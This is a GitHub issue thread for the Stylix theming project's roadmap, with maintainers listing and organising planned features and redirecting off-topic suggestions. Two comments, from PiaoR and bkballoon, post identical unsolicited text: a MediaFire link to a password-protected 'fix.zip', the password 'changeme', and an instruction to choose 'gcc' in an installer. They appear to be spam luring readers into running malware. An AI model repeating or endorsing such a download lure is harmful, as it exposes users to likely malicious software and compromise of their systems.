### ISSUE TITLE
Stylix Roadmap

### ISSUE THREAD

**Issue by trueNAHO** [danth/stylix#534]
This tracking issue outlines my upcoming Stylix work, serving as both a reference and personal reminder.

1. Clean up codebase to simplify future development and boost motivation
2. Add reliable tests to increase code confidence
3. Optionalize wallpaper functionality [1] [4] early due to high demand
4. Support base24 scheme [3] to enable upcoming features
5. Support VIM highlight groups [2] to resolve styling inconsistencies
6. Implement slideshow [5] which will arguably be the coolest Stylix feature

The first two tasks are expected to be the most time-consuming.

[1]: https://github.com/danth/stylix/issues/200
[2]: https://github.com/danth/stylix/issues/249
[3]: https://github.com/danth/stylix/issues/252
[4]: https://github.com/danth/stylix/issues/442
[5]: https://github.com/danth/stylix/pull/477#issuecomment-2254170449

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Eveeifyeve** [comment]
Just to neat the roadmap here:

- [ ] Clean up codebase to simplify future development and boost motivation
   - https://github.com/danth/stylix/issues/238
   - https://github.com/danth/stylix/issues/251
   - https://github.com/danth/stylix/issues/275
   - https://github.com/danth/stylix/issues/268
   - https://github.com/danth/stylix/issues/313
   - https://github.com/danth/stylix/issues/366
   - https://github.com/danth/stylix/issues/379
   - https://github.com/danth/stylix/issues/400
   - https://github.com/danth/stylix/issues/543
   - https://github.com/danth/stylix/issues/704
   - https://github.com/danth/stylix/pull/419
   - https://github.com/danth/stylix/pull/519

- [ ] Add reliable tests to increase code confidence
   - https://github.com/danth/stylix/issues/319

- [ ] Optionalize wallpaper functionality
   - https://github.com/danth/stylix/issues/200
   - https://github.com/danth/stylix/issues/442
   - https://github.com/danth/stylix/pull/717

- [ ] Support base24 scheme and Vim highlight groups to resolve styling inconsistencies
   - https://github.com/danth/stylix/issues/252
   - https://github.com/danth/stylix/issues/249

- [ ] Support individual module customizations
   - https://github.com/danth/stylix/issues/208
   - https://github.com/danth/stylix/issues/685

- [ ] Implement slideshow with post-processing capabilities
   - https://github.com/danth/stylix/issues/63
   - https://github.com/danth/stylix/pull/477#issuecomment-2254170449
   - https://github.com/danth/stylix/pull/477#issuecomment-2304904560

- [ ] Support automatic polarity switch based on sunset and sunrise
   - https://github.com/danth/stylix/issues/447#issuecomment-2351837256

**Comment by Flameopathic** [comment]
consider having (4) include optionalizing every top-level theme setting

some links: #940 #248 #929

**Comment by Mikilio** [comment]
Some modules rely on custom mustache templates for base16, even though there is a maintained alternative in other frameworks.
The Qt module is one of them, and I recently had to update the mustache template in PR #2023 because it has been causing visual artifacts after Qt has been significantly evolving in the last year. In stylix it is not uncommon that modules don't get their CSS updated frequently and that no one checks.

With PR #892 we'd have a color scheme generator for Material You theme. For Qt, there is a maintained Material You theme.

Since we'd have another theme generator to choose from, I'd like to track modules that could use them so we could get rid of all abandoned custom CSS/mustache and replace them with maintained flexible themes.

My first thought is that this might be the right place.

**Comment by trueNAHO** [comment]
> With PR [#892](https://github.com/nix-community/stylix/pull/892) we'd have a color scheme generator for Material You theme. For Qt, there is a maintained Material You theme.

Whether Material You will be interfaced is still undecided. [1] [2] That discussion does not belong in this tracker.

> Some modules rely on custom mustache templates for base16, even though there is a maintained alternative in other frameworks. The Qt module is one of them, and I recently had to update the mustache template in PR [#2023](https://github.com/nix-community/stylix/pull/2023) because it has been causing visual artifacts after Qt has been significantly evolving in the last year. In stylix it is not uncommon that modules don't get their CSS updated frequently and that no one checks.
>
> [...]
>
> I'd like to track modules that could use them so we could get rid of all abandoned custom CSS/mustache and replace them with maintained flexible themes.
>
> My first thought is that this might be the right place.

Please open a new dedicated tracker for this, as this tracker is the top-most tracker for major end-user functionalities:

> This roadmap is intentionally incomplete, as remaining tasks are either comparatively low priority (in the context of the project roadmap) or dependent on the work outlined here, making it somewhat pointless to really plan them in advance. For the "complete" roadmap see the [open issues](https://github.com/nix-community/stylix/issues?q=is%3Aissue%20state%3Aopen%20).

This tracker may have many subscribers.

[1]: https://github.com/nix-community/stylix/issues/252
[2]: https://github.com/nix-community/stylix/pull/892#issuecomment-3575942423
